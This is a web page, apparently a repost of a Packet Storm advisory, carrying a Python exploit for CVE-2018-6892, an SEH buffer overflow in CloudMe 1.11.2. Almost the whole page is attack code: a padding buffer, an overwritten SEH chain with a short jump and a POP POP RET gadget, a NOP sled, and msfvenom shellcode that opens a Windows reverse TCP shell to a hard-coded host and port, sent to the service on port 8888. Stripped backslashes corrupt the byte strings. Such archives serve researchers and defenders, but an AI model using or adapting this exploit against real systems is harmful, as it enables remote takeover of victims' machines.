CloudMe 1.11.2 SEH Buffer Overflow ≈ Packet Storm – Digitalmunition




Exploit/Advisories no-image-featured-image.png

Published on August 6th, 2020 📆 | 4615 Views ⚑

0

CloudMe 1.11.2 SEH Buffer Overflow ≈ Packet Storm

import socket
import sys

target = “127.0.0.1”

#Written by : lutzenfried (Clement Cruchet)
#Exploiting CloudMe 1.11.2 (Publisher : CloudMe AB)
#Windows x64 10.0.18362 Build 18362
#Buffer Overflow using SEH overwritten technic (POP POP RET)
#Exploit for CVE-2018-6892

#Technical information used for exploit development
#Register EIP is overwritten with pattern at position 1052 in thread 1676
#SEH register is overwritten with pattern at position 2344 in thread 1676
#Bad characters : x00x0Ax0D
#0x61f2ba2e | pop edi, pop ebp, ret | False | False | False | False | False | C:Usersuser1AppDataLocalProgramsCloudMeCloudMeQt5Gui.dll

buf = “x41” * 2344
seh = “xEBx08x90x90” #Replace to short JMP
nseh = “x2exbaxf2x61” #Replace to POP POP RET
nopsled = b”x90″*20 #NOP sled to go into payload

#msfvenom -a x86 -p windows/shell/reverse_tcp LHOST=192.168.0.112 LPORT=4545 -b ‘x00x0Ax0D’ -f python
payload = b””
payload += b”xdaxdbxbfx52xf0xeax4axd9x74x24xf4x58x33″
payload += b”xc9xb1x56x83xe8xfcx31x78x14x03x78x46x12″
payload += b”x1fxb6x8ex50xe0x47x4ex35x68xa2x7fx75x0e”
payload += b”xa6x2fx45x44xeaxc3x2ex08x1fx50x42x85x10″
payload += b”xd1xe9xf3x1fxe2x42xc7x3ex60x99x14xe1x59″
payload += b”x52x69xe0x9ex8fx80xb0x77xdbx37x25xfcx91″
payload += b”x8bxcex4ex37x8cx33x06x36xbdxe5x1dx61x1d”
payload += b”x07xf2x19x14x1fx17x27xeex94xe3xd3xf1x7c”
payload += b”x3ax1bx5dx41xf3xeex9fx85x33x11xeaxffx40″
payload += b”xacxedx3bx3bx6ax7bxd8x9bxf9xdbx04x1ax2d”
payload += b”xbdxcfx10x9axc9x88x34x1dx1dxa3x40x96xa0″
payload += b”x64xc1xecx86xa0x8axb7xa7xf1x76x19xd7xe2″
payload += b”xd9xc6x7dx68xf7x13x0cx33x9fxd0x3dxccx5f”
payload += b”x7fx35xbfx6dx20xedx57xddxa9x2bxafx54xbd”
payload += b”xcbx7fxdexaex35x80x1exe6xf1xd4x4ex90xd0″
payload += b”x54x05x60xdcx80xb3x6ax4ax21x49x65xbfx5d”
payload += b”x4fx79xaex5cxc6x9fx80x0ex88x0fx61xffx68″
payload += b”xe0x09x15x67xdfx2ax16xa2x48xc0xf9x1ax20″
payload += b”x7dx63x07xbax1cx6cx92xc6x1fxe6x16x36xd1″
payload += b”x0fx53x24x06x68x9bxb4xd7x1dx9bxdexd3xb7″
payload += b”xccx76xdexeex3axd9x21xc5x39x1exddx98x0b”
payload += b”x54xe8x0ex33x02x15xdfxb3xd2x43xb5xb3xba”
payload += b”x33xedxe0xdfx3bx38x95x73xaexc3xcfx20x79″
payload += b”xacxedx1fx4dx73x0ex4axcdx74xf0x08xfaxdc”
payload += b”x98xf2xbaxdcx58x99x3ax8dx30x56x14x22xf0″
payload += b”x97xbfx6bx98x12x2exd9x39x22x7bxbfxe7x23″
payload += b”x88x64x18x59xe1x9bxd9x9exebxffxdax9ex13″
payload += b”xfexe7x48x2ax74x26x49x09x87x1dxecx38x02″
payload += b”x5dxa2x3bx07″

run = buf + seh + nseh + nopsled + payload

try:
s=socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((target,8888))
s.send(run)

except Exception as e:
print(sys.exc_value)

Source link

Tagged with:



Leave a Reply

Your email address will not be published. Required fields are marked *


loading...